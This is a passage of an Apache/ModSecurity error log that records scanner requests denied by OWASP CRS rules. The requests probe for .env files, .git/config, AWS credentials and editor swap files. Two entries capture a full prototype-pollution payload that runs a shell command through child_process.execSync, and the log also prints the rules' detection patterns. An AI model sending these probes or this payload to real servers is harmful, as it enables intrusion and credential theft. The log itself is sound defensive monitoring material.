"aTyImyS8hAm-CWbnihKhZAAAAAg"]
[Fri Dec 12 22:26:51.317646 2025] [:error] [pid 700178] [client 63.177.100.118:34786] [client 63.177.100.118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTyImyS8hAm-CWbnihKhZAAAAAg"]
[Fri Dec 12 22:26:51.317824 2025] [:error] [pid 700178] [client 63.177.100.118:34786] [client 63.177.100.118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTyImyS8hAm-CWbnihKhZAAAAAg"]
[Sat Dec 13 03:09:11.734819 2025] [:error] [pid 704177] [client 204.76.203.25:51470] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTzKx-3sT8Fm_4rEDZjXvAAAAAE"]
[Sat Dec 13 03:09:11.735245 2025] [:error] [pid 704177] [client 204.76.203.25:51470] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTzKx-3sT8Fm_4rEDZjXvAAAAAE"]
[Sat Dec 13 03:09:11.735471 2025] [:error] [pid 704177] [client 204.76.203.25:51470] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTzKx-3sT8Fm_4rEDZjXvAAAAAE"]
[Sat Dec 13 11:20:07.625786 2025] [:error] [pid 704176] [client 62.60.131.162:50343] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT0919RuPxU8civBjUdQIQAAAAA"]
[Sat Dec 13 11:20:07.626798 2025] [:error] [pid 704176] [client 62.60.131.162:50343] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT0919RuPxU8civBjUdQIQAAAAA"]
[Sat Dec 13 11:20:07.626978 2025] [:error] [pid 704176] [client 62.60.131.162:50343] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT0919RuPxU8civBjUdQIQAAAAA"]
[Sat Dec 13 12:25:55.171779 2025] [:error] [pid 704178] [client 18.234.28.157:41284] [client 18.234.28.157] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aT1NQ41u9oCb1jebgY7y2QAAAAI"]
[Sat Dec 13 12:25:55.172262 2025] [:error] [pid 704178] [client 18.234.28.157:41284] [client 18.234.28.157] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aT1NQ41u9oCb1jebgY7y2QAAAAI"]
[Sat Dec 13 12:25:55.173202 2025] [:error] [pid 704178] [client 18.234.28.157:41284] [client 18.234.28.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aT1NQ41u9oCb1jebgY7y2QAAAAI"]
[Sat Dec 13 12:25:55.173378 2025] [:error] [pid 704178] [client 18.234.28.157:41284] [client 18.234.28.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aT1NQ41u9oCb1jebgY7y2QAAAAI"]
[Sat Dec 13 14:35:45.411058 2025] [authz_core:error] [pid 704177] [client 62.60.131.73:55746] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/www
[Sat Dec 13 14:35:47.309602 2025] [:error] [pid 704178] [client 62.60.131.73:52995] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/composer.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.lock found within REQUEST_FILENAME: /composer.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/composer.lock"] [unique_id "aT1rs41u9oCb1jebgY7y5AAAAAI"]
[Sat Dec 13 14:35:47.309847 2025] [:error] [pid 704178] [client 62.60.131.73:52995] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/composer.lock"] [unique_id "aT1rs41u9oCb1jebgY7y5AAAAAI"]
[Sat Dec 13 14:35:47.310043 2025] [:error] [pid 704178] [client 62.60.131.73:52995] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/composer.lock"] [unique_id "aT1rs41u9oCb1jebgY7y5AAAAAI"]
[Sat Dec 13 14:35:47.313477 2025] [:error] [pid 704179] [client 62.60.131.73:60592] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sendgrid"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.sendgrid"] [unique_id "aT1rsyDuuXJJBU7c_tq6CgAAAAM"]
[Sat Dec 13 14:35:47.313770 2025] [:error] [pid 704179] [client 62.60.131.73:60592] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.sendgrid"] [unique_id "aT1rsyDuuXJJBU7c_tq6CgAAAAM"]
[Sat Dec 13 14:35:47.313940 2025] [:error] [pid 704179] [client 62.60.131.73:60592] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.sendgrid"] [unique_id "aT1rsyDuuXJJBU7c_tq6CgAAAAM"]
[Sat Dec 13 14:35:47.314501 2025] [:error] [pid 704180] [client 62.60.131.73:60783] [client 62.60.131.73] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.wp-config.php.swp"] [unique_id "aT1rs6mWKJxSpHIIfei57wAAAAQ"]
[Sat Dec 13 14:35:47.314837 2025] [:error] [pid 704180] [client 62.60.131.73:60783] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.wp-config.php.swp"] [unique_id "aT1rs6mWKJxSpHIIfei57wAAAAQ"]
[Sat Dec 13 14:35:47.314993 2025] [:error] [pid 704180] [client 62.60.131.73:60783] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.wp-config.php.swp"] [unique_id "aT1rs6mWKJxSpHIIfei57wAAAAQ"]
[Sat Dec 13 14:35:47.315645 2025] [:error] [pid 704176] [client 62.60.131.73:59199] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aT1rs9RuPxU8civBjUdQMgAAAAA"]
[Sat Dec 13 14:35:47.315830 2025] [:error] [pid 704176] [client 62.60.131.73:59199] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aT1rs9RuPxU8civBjUdQMgAAAAA"]
[Sat Dec 13 14:35:47.315984 2025] [:error] [pid 704176] [client 62.60.131.73:59199] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aT1rs9RuPxU8civBjUdQMgAAAAA"]
[Sat Dec 13 14:35:47.373749 2025] [:error] [pid 704178] [client 62.60.131.73:60186] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /prevlaravel/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aT1rs41u9oCb1jebgY7y5QAAAAI"]
[Sat Dec 13 14:35:47.373974 2025] [:error] [pid 704178] [client 62.60.131.73:60186] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aT1rs41u9oCb1jebgY7y5QAAAAI"]
[Sat Dec 13 14:35:47.374153 2025] [:error] [pid 704178] [client 62.60.131.73:60186] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aT1rs41u9oCb1jebgY7y5QAAAAI"]
[Sat Dec 13 14:35:47.379430 2025] [authz_core:error] [pid 704176] [client 62.60.131.73:55778] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sat Dec 13 14:35:47.417205 2025] [:error] [pid 714712] [client 62.60.131.73:55576] [client 62.60.131.73] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aT1rsyTMOdrVkGQ5T32MlAAAAAk"]
[Sat Dec 13 14:35:47.417446 2025] [:error] [pid 714712] [client 62.60.131.73:55576] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aT1rsyTMOdrVkGQ5T32MlAAAAAk"]
[Sat Dec 13 14:35:47.417634 2025] [:error] [pid 714712] [client 62.60.131.73:55576] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aT1rsyTMOdrVkGQ5T32MlAAAAAk"]
[Sat Dec 13 14:35:47.441589 2025] [:error] [pid 704176] [client 62.60.131.73:59554] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aT1rs9RuPxU8civBjUdQNAAAAAA"]
[Sat Dec 13 14:35:47.441883 2025] [:error] [pid 704176] [client 62.60.131.73:59554] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aT1rs9RuPxU8civBjUdQNAAAAAA"]
[Sat Dec 13 14:35:47.442056 2025] [:error] [pid 704176] [client 62.60.131.73:59554] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aT1rs9RuPxU8civBjUdQNAAAAAA"]
[Sat Dec 13 14:35:47.456623 2025] [:error] [pid 704178] [client 62.60.131.73:55725] [client 62.60.131.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.slack"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.slack"] [unique_id "aT1rs41u9oCb1jebgY7y5gAAAAI"]
[Sat Dec 13 14:35:47.456846 2025] [:error] [pid 704178] [client 62.60.131.73:55725] [client 62.60.131.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.slack"] [unique_id "aT1rs41u9oCb1jebgY7y5gAAAAI"]
[Sat Dec 13 14:35:47.457009 2025] [:error] [pid 704178] [client 62.60.131.73:55725] [client 62.60.131.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.slack"] [unique_id "aT1rs41u9oCb1jebgY7y5gAAAAI"]
[Sat Dec 13 14:35:47.494299 2025] [authz_core:error] [pid 704367] [client 62.60.131.73:56844] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htpasswd
[Sat Dec 13 14:35:48.480696 2025] [:error] [pid 714714] [client 62.60.131.73:59093] [client 62.60.131.73] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aT1rtAGjewIfvkGPhVURkQAAAAs"]
